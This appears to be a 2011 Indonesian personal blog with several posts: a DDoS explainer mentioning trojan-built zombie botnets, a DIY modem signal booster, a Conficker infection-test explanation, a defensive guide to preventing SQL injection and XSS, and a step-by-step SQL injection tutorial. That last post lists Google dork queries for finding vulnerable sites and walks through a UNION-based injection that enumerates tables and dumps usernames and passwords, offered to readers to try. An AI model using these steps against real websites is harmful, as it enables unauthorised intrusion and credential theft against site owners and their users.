Senin, 19 Desember 2011

Contoh Sederhana DDoS Distributed Denial of Service Skala Kecil

Attacker = Hacker
Master = Server Computer skala kecil (Contoh Server Warnet)
Slaves = Personal Computer yang terinfeksi virus/trojan DDoS
Victim DNS Server = www. target.com

Contoh skala kecil di Lab Linux BSI tentang DDoS
20 PC Mahasiswa ping ke PC Dosen, walaupun tidak akan terasa karena beban yang kecil tetapi ini sudah termasuk serangan DDoS skala kecil
bayangkan jika ada 1000 PC/Komputer ping ke Komputer Dosen, sudah di pastikan akan memperberat kinerja komputer dosen tersebut

Nah untuk melangsungkan serangan DDoS Skala Besar untuk Mainframe Komputer, maka seorang Hacker akan memanfaatkan sebuah program trojan/virus untuk membuat komputer zombie. Komputer Zombie akan melakukan ping ke komputer server tersebut, semakin banyak komputer zombie maka akan semakin besar pula dampaknya ke server tersebut

Diposting oleh di Tidak ada komentar:

Minggu, 18 Desember 2011

Penguat Sinyal Modem Sederhana

1. Sendok (sendok makan,usahakan yg materialnya agak tipis ya gan )

2. Tutup kaleng Biskuit sama pengait kertas buat penjepit Modem

3. Jangan Lupa Modemnya ya gan

4. Kabel USB

5. Kaleng Parfum

?... Tenang ajah masih ada petunjuk lg kok
ah ini gambar bahan-bahannya:
Barang kali agan bingung jadi ane liatin

 Cara Buat'nya :

1. Sendok ditekuk seperti pada gambar,tujuannya untuk menjepit Modem agan tp jangan terlalu sempit ntar modem Agan Lecet malah rusak.
















Jangan nyuri sendok tetangga yah Gan, tar panjang urusannya...

2. Tutup kaleng biskuit yang dilem dengan penjepit ketas tapi ingat penjepit kertas'nya udah direnggangin supaya tidak terlalu keras saat mencepit Modemnya.
Barang gini ternyata bermanfaat & Sakti juga





















3. Kaleng Parfum yg berfungsi seperti antena trs letakan didekat modem.

4. Jangan lupa bagi modem yg cepat panas antisipasi dengan dikipas.

5. Cari posisi yg bagus,liat perubahan sinyalnya.

6. Selamat Mencoba semoga bermanfaat.


Nah trus dirangkai seperti gambar :
Spoiler for Rangkaian:
Dirangkai kayak gini ya gan,biar mirip kaya punya Ane

Dulu sebelum make ini : 
Spoiler for Signal Sebelum:MISKIN HSDPA



Nah kalo berhasil Sinyal Modem bisa jadi :
Spoiler for Signal Sesudah: FULL HSDPA

Nah sekarang ane liatin kecepatan Downloads'nya , meski kecil tp lumayan buat nemenin bengong di KOST (alias sambil Downloads Film)
Spoiler for Downloads Sebelum make:

Dulu downloads file segitu ajah bisa sambil ngrokok 1 batang

 
Spoiler for Downloads Sesudah make: Sekarang udah Bisa

 
Diposting oleh di Tidak ada komentar:

Test Conficker

Virus Conficker yang juga dikenal dengan nama Kido atau Downadup rasanya sudah pasti akrab di telinga administrator komputer di tahun 2009 ini. Salah satu jenis virus berkategori worm yang melakukan penyebaran yang sangat dahsyat dan memiliki dampak yang sangat serius bagi komputer di jaringan.

Penjelasan Hasil Test:

Jika anda melihat ini:maka kemungkinan komputer anda:
Functioning normally= Normal/Tidak terinfeksi oleh Conficker (atau menggunakan proxy)
Possible Conficker C or greater infection
=  Kemungkinan Besar Terinfeksi Conficker (C variant atauLebih Berbahaya)
Possible Conficker A or B infection
= Kemungkinan Besar terinfeksi Conficker A/B variant
Image loading off?= Check kembali koneksi internet anda?
Jika Muncul Kombinasi ini= Koneksi Internet yang jelek?
 Conficker (alias Downadup, Kido) dikenal memblokir akses ke lebih dari 100 anti-virus dan keamanan situs.

Jika Anda diblokir dari memuat gambar terpencil di baris pertama dari tabel teratas di atas (AV / keamanan situs) tetapi tidak diblokir dari memuat gambar pada baris kedua (website alternatif dari sistem operasi) maka PC Windows Anda dapat terinfeksi oleh Conficker (atau beberapa perangkat lunak berbahaya lainnya).

Jika Anda dapat melihat semua enam gambar di kedua baris tabel atas, Anda baik tidak terinfeksi oleh Conficker, atau Anda mungkin menggunakan proxy server, dalam hal ini Anda tidak akan dapat menggunakan tes ini untuk membuat tekad yang akurat, karena Conficker akan mampu blok Anda dari melihat AV / situs keamanan.


Untuk Mengetahui Komputer Anda Terinfeksi Virus Conficker atau tidak silahkan click DISINI 


Test ini sangat mudah dan tidak perlu waktu yang lama
Diposting oleh di Tidak ada komentar:

Mencegah SQL Injection

Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)
Percaya atau tidak kalau mengamankan web itu lebih sulit daripada merusak tampilan atau merusak database dari web tersebut. Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan webmaster masih sering dilakukan.
1. Pencegahan SQL Injection, contoh sintak SQL Injection :
?or 1=1–
Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (–), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql:
mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :
Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.
3. Pemasukkan Tag HTML.
Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars).
Contoh script :
function cleanup($value=”", $preserve=”", $tag=”") {
if (empty($preserve)) {
$value=strip_tags($value, $allowed_tags);
}
$value=htmlspecialchars($value);
return $value;
}
4. Batasi penggunaan Java Script dan jangan menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup matinya web anda, karena java script bersifat client dan membuat akses yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti PHP dan ASP karena sudah bersifat server.
5. Penyimpanan file database sebaiknya disimpan dlm directory private. Jangan pernah menyimpannya di directory public yang memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting sudah menyediakan direktori khusus untuk database. Dalam keamanan database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi dengan SSL. Data yang penting jangan disimpan secara langsung melainkan sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512 atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.
6. Berhati hatilah memilih webhosting, itu sudah kami buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang diserang kita tidak bisa berbuat apa apa.
Diposting oleh di Tidak ada komentar:

SQL Injection

sql injection adalah serangan yang memanfaatkan kelalaian dari website, dan juga sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client, dan juga sql injection merupakan teknik mengeksploitasi qwb aplikasi yang didalamnya menggunakan database untuk penyimpanan data

Cara-cara SQL injection:
=> cari target web yang ingin di sql injection dengan cara serching di google dengan menggunakan kata kunci, contohnya sebagai berikut

>>inurl:trainers.php?id=
>>inurl:buy.php?category=
>>inurl:article.php?ID=
>>inurl:play_old.php?id=
>>inurl:declaration_more.php?decl_id=

=> nah, jika sudah memilih web yang ingn di sql injection, untuk mengecek apakah web tersebut bisa di sql injection yaitu dengan cara menambahkan di urlnya yang terakhir dengan simbol petik satu('), jika terjadi error sql, maka web tersebut bisa di sql injection.
example:(http://testsql.com/news.php?id=321')

=> langkah selanjutnya, adalah hapus tanda petik yang tadi, kemudian di tambahkan kata order by 1--, ini berfungsi untuk mencari kesalahan pada web tersebut, intinya kita mencari error pada web tersebut, jika sudah menemukan error maka yang diambil nilai sebelum error.
example:
(http://testsql.com/news.php?id=321 order by 1-- no error )
(http://testsql.com/news.php?id=321 order by 2-- no error )
(http://testsql.com/news.php?id=321 order by 3-- no error )
(http://testsql.com/news.php?id=321 order by 4-- no error )
(http://testsql.com/news.php?id=321 order by 5-- no error )
(http://testsql.com/news.php?id=321 order by 6-- no error )
(http://testsql.com/news.php?id=321 order by 7-- error )
nah berati yang diambil yang ini http://testsql.com/news.php?id=321 order by 6--

=> kemudian anda ganti order by nya dengan union all select, kemudian angka 6 nya di jabarkan satu per satu seperti 1,2,3,4,5,6 dan di depan angka sesudah = anda tambahkan -, jadi contohnya seperi ini.
(http://testsql.com/news.php?id=-321 union all select 1,2,3,4,5,6--)

=> nanti akan muncul angka-angka, anda ambil salah satu jah, tapi menurut saya ambil angka yang paling atas, kemudian pada url'a, pada angka yang tertera anda ganti dengan @@version, ini berfungsi untuk menampilkan versi mysql, kita disini akan menjeaskan sql injection dengan menggunakan mysql versi 5, misalkan ada angka 3, nah angka 3 nya anda ganti dengan @@version.
example :(http://testsql.com/news.php?id=-321 union all select 1,2,@@version,4,5,6--)

=> kemudian nanti ankan muncul angka, angka tersebut merupakan keterangan versi mysql yang digunakan web tersebut, jika keluarnya 5.0.1 maka kita bisa mengsql injection web tersebut.., langsung jah, yang @@version anda ganti dengan group_concat(table_name) lalu pada akhir url sebelum -- anda tambahkan dengan from information_schema.tables where table_schema=databses().
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--)

=> kemudian akan muncul beberapa tulisan, kita cari yang berhubungan dengan admin / user, karena kita disini mencari table user / admin, jika sudah nemu kata admin / user, langkah selanjutnya kata admin / user anda convert menjadi hex, bisa menggunkan web disini http://www.string-functions.com/string-hex.aspx (hasil dari convert hex user = 75736572), jika sudah, langkah selanjutnya adalah mengganti kata databse() dengan hasil conver hex yang tadi dan ditambahkan dengan 0x(misalkan kita ambil kata user), kemudian ganti kata table yang ada di dalam kurung menjadi column dan kata tables diganti dengan columns, lalu kata table_schema, kata schemanya itu di ganti dengan kata name.
example: (http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x75736572--)

=> nanti akan muncul hasil dari table yang dicari, biasanya yang keluar adalah user dan password, maka kata user dan password anda copy, lalu kata column_name yang ada di dalam kurung anda ganti dengan user dan password, dimana ditengah-tengah user dan password ditambahkan kata 0x3a, lalu yang hasil hex nya diganti dengan kata sebelum di convert ke hex(misalkan awalanya tadi ambil kata user, nah kita ganti dengan kata user) kata information'a anda hapus sampai sama dengan (=).
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(user,0x3a,password),4,5,6 from user--)

=> nanti akan muncul user dan password(biasanya password tidak dalam bentuk string).

SELAMAT MENCOBA
sumber
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)